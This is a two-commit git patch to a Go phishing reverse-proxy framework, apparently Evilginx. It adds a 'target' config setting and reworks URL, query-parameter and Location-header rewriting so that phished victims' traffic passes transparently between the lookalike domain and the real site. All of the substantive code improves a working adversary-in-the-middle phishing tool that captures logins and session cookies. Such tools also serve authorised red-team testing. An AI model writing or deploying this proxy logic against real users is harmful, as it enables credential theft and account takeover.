From a4e4153a736c482249d46b3473328910f9377d74 Mon Sep 17 00:00:00 2001 From: ziggoon Date: Thu, 19 Sep 2024 09:26:30 -0500 Subject: [PATCH 1/2] wee woo requests not being modified properly --- core/banner.go | 2 ++ core/config.go | 12 ++++++++ core/http_proxy.go | 70 ++++++++++++++++++++++++++++++++++++++-------- core/terminal.go | 7 +++-- 4 files changed, 77 insertions(+), 14 deletions(-) diff --git a/core/banner.go b/core/banner.go index d71ae070d..680ad479c 100644 --- a/core/banner.go +++ b/core/banner.go @@ -111,4 +111,6 @@ func Banner() { fmt.Println() putAsciiArt("__ __\n") fmt.Println() + fmt.Println(" meow @ziggoon") + fmt.Println() } diff --git a/core/config.go b/core/config.go index 7404a824a..f858c7338 100644 --- a/core/config.go +++ b/core/config.go @@ -74,6 +74,7 @@ type GeneralConfig struct { HttpsPort int `mapstructure:"https_port" json:"https_port" yaml:"https_port"` DnsPort int `mapstructure:"dns_port" json:"dns_port" yaml:"dns_port"` Autocert bool `mapstructure:"autocert" json:"autocert" yaml:"autocert"` + Target string `mapstructure:"target" json:"target" yaml:"target"` } type Config struct { @@ -496,6 +497,17 @@ func (c *Config) EnableAutocert(enabled bool) { c.cfg.WriteConfig() } +func (c *Config) SetTarget(target string) { + c.general.Target = target + c.cfg.Set(CFG_GENERAL, c.general) + log.Info("target set to: %s", target) + c.cfg.WriteConfig() +} + +func (c *Config) GetTarget() string { + return c.general.Target +} + func (c *Config) refreshActiveHostnames() { c.activeHostnames = []string{} sites := c.GetEnabledSites() diff --git a/core/http_proxy.go b/core/http_proxy.go index 88a024709..9cc9c1448 100644 --- a/core/http_proxy.go +++ b/core/http_proxy.go @@ -647,6 +647,7 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da if len(qs) > 0 { for gp := range qs { for i, v := range qs[gp] { + v = p.replacePhishingDomainInValue(v) qs[gp][i] = string(p.patchUrls(pl, []byte(v), CONVERT_TO_ORIGINAL_URLS)) } } @@ -935,10 +936,15 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da // if "Location" header is present, make sure to redirect to the phishing domain r_url, err := resp.Location() if err == nil { - if r_host, ok := p.replaceHostWithPhished(r_url.Host); ok { - r_url.Host = r_host - resp.Header.Set("Location", r_url.String()) - } + // log.Debug("Original Location header: %s", r_url.String()) + if r_host, ok := p.replaceHostWithPhished(r_url.Host); ok { + r_url.Host = r_host + new_location := r_url.String() + resp.Header.Set("Location", new_location) + // log.Info("Updated Location header: %s", new_location) + } else { + log.Warning("Failed to replace host in Location header: %s", r_url.String()) + } } // fix cookies @@ -1508,17 +1514,35 @@ func (p *HttpProxy) patchUrls(pl *Phishlet, body []byte, c_type int) []byte { if err == nil { for _, h := range hosts { if strings.ToLower(u.Host) == h { - s_url = strings.Replace(s_url, u.Host, sub_map[h], 1) + u.Host = sub_map[h] break } } + // Check and replace in query parameters + q := u.Query() + for key, values := range q { + for _, value := range values { + decodedValue, err := url.QueryUnescape(value) + if err == nil { + for _, h := range hosts { + if strings.Contains(decodedValue, h) { + decodedValue = strings.Replace(decodedValue, h, sub_map[h], -1) + q.Set(key, url.QueryEscape(decodedValue)) + break + } + } + } + } + } + u.RawQuery = q.Encode() } - return s_url + return u.String() })) + body = []byte(re_ns_url.ReplaceAllStringFunc(string(body), func(s_url string) string { for _, h := range hosts { if strings.Contains(s_url, h) && !strings.Contains(s_url, sub_map[h]) { - s_url = strings.Replace(s_url, h, sub_map[h], 1) + s_url = strings.Replace(s_url, h, sub_map[h], -1) break } } @@ -1729,6 +1753,13 @@ func (p *HttpProxy) replaceHostWithPhished(hostname string) (string, bool) { prefix = "." hostname = hostname[1:] } + + host, port, err := net.SplitHostPort(hostname) + if err != nil { + host = hostname + port = "" + } + for site, pl := range p.cfg.phishlets { if p.cfg.IsSiteEnabled(site) { phishDomain, ok := p.cfg.GetSiteDomain(pl.Name) @@ -1736,11 +1767,19 @@ func (p *HttpProxy) replaceHostWithPhished(hostname string) (string, bool) { continue } for _, ph := range pl.proxyHosts { - if hostname == combineHost(ph.orig_subdomain, ph.domain) { - return prefix + combineHost(ph.phish_subdomain, phishDomain), true + if host == combineHost(ph.orig_subdomain, ph.domain) { + phishedHost := combineHost(ph.phish_subdomain, phishDomain) + if port != "" { + phishedHost = net.JoinHostPort(phishedHost, port) + } + return prefix + phishedHost, true } - if hostname == ph.domain { - return prefix + phishDomain, true + if host == ph.domain { + phishedHost := phishDomain + if port != "" { + phishedHost = net.JoinHostPort(phishedHost, port) + } + return prefix + phishedHost, true } } } @@ -1966,7 +2005,7 @@ func (dumb dumbResponseWriter) Hijack() (net.Conn, *bufio.ReadWriter, error) { func orPanic(err error) { if err != nil { panic(err) - } + } } func getContentType(path string, data []byte) string { @@ -1987,3 +2026,10 @@ func getSessionCookieName(pl_name string, cookie_name string) string { s_hash = s_hash[:4] + "-" + s_hash[4:] return s_hash } + +func (p *HttpProxy) replacePhishingDomainInValue(value string) string { + if p.cfg.general.Domain != "" && p.cfg.general.Target != "" { + return strings.Replace(value, p.cfg.general.Domain, p.cfg.general.Target, -1) + } + return value +} diff --git a/core/terminal.go b/core/terminal.go index b1ae75b2f..387add72f 100644 --- a/core/terminal.go +++ b/core/terminal.go @@ -192,8 +192,8 @@ func (t *Terminal) handleConfig(args []string) error { gophishInsecure = "true" } - keys := []string{"domain", "external_ipv4", "bind_ipv4", "https_port", "dns_port", "unauth_url", "autocert", "gophish admin_url", "gophish api_key", "gophish insecure"} - vals := []string{t.cfg.general.Domain, t.cfg.general.ExternalIpv4, t.cfg.general.BindIpv4, strconv.Itoa(t.cfg.general.HttpsPort), strconv.Itoa(t.cfg.general.DnsPort), t.cfg.general.UnauthUrl, autocertOnOff, t.cfg.GetGoPhishAdminUrl(), t.cfg.GetGoPhishApiKey(), gophishInsecure} + keys := []string{"domain", "target", "external_ipv4", "bind_ipv4", "https_port", "dns_port", "unauth_url", "autocert", "gophish admin_url", "gophish api_key", "gophish insecure"} + vals := []string{t.cfg.general.Domain, t.cfg.general.Target, t.cfg.general.ExternalIpv4, t.cfg.general.BindIpv4, strconv.Itoa(t.cfg.general.HttpsPort), strconv.Itoa(t.cfg.general.DnsPort), t.cfg.general.UnauthUrl, autocertOnOff, t.cfg.GetGoPhishAdminUrl(), t.cfg.GetGoPhishApiKey(), gophishInsecure} log.Printf("\n%s\n", AsRows(keys, vals)) return nil } else if pn == 2 { @@ -203,6 +203,9 @@ func (t *Terminal) handleConfig(args []string) error { t.cfg.ResetAllSites() t.manageCertificates(false) return nil + case "target": + t.cfg.SetTarget(args[1]) + return nil case "ipv4": t.cfg.SetServerExternalIP(args[1]) return nil From 0af9d2ed0bd6fdc22a6d57c04bc57ad4b1050250 Mon Sep 17 00:00:00 2001 From: ziggoon <79215783+ziggoon@users.noreply.github.com> Date: Fri, 20 Sep 2024 11:31:15 -0500 Subject: [PATCH 2/2] Update banner.go --- core/banner.go | 2 -- 1 file changed, 2 deletions(-) diff --git a/core/banner.go b/core/banner.go index 680ad479c..d71ae070d 100644 --- a/core/banner.go +++ b/core/banner.go @@ -111,6 +111,4 @@ func Banner() { fmt.Println() putAsciiArt("__ __\n") fmt.Println() - fmt.Println(" meow @ziggoon") - fmt.Println() }